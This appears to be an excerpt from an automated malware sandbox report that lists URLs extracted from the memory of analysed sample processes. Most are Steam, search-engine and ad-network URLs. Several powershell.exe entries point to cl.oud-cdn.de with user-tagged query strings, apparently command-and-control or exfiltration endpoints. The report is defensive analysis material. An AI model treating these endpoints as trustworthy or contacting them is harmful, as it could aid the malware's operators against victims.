Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=16
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=16964251364Z
Source: 4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=16964251364v
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768067586.0000000005AC8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768191917.0000000005ABF000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2891340741.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890694002.00000000056E3000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3057598446.0000000005C4F000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096841796.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3191846589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3095820288.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: powershell.exe, 00000019.00000002.2938442239.000000000954F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cl.oud-cdn.de
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cl.oud-cdn.de/
Source: powershell.exe, 00000019.00000002.2938442239.000000000954F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cl.oud-cdn.de/?ch=user
Source: powershell.exe, 00000019.00000002.2938442239.000000000954F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cl.oud-cdn.de/?ch=user%7cpgkoujvbvlam
Source: powershell.exe, 00000019.00000002.2938442239.0000000009A37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cl.oud-cdn.de/?vhyneVXjVGxXWDBAHPFQ=vMcvSUhjRwUjZHoUBOuO.txt
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fa
Source: 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=h6HMV-M6cfAX&a
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=1Zpka7DM_TWk&l=english
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=qM6wpZLwO_gf&amp
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=g2Zx7e0yBV_M&l=english
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=ftiDdX_V0QeB&l=englis
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=KLqJaM1v
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=_zjj
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=0IXKH44IpF1u&l=english
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=1vfyNnvUqkgy&l=engl
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&l=english
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=Gr5o1d5GQef0&l=en
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=IJn7qVh5q-RP&l=e
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=HNbD--FePQTr&l=english
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&l=engl
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=2VOT8-1_tx9Q&l=en
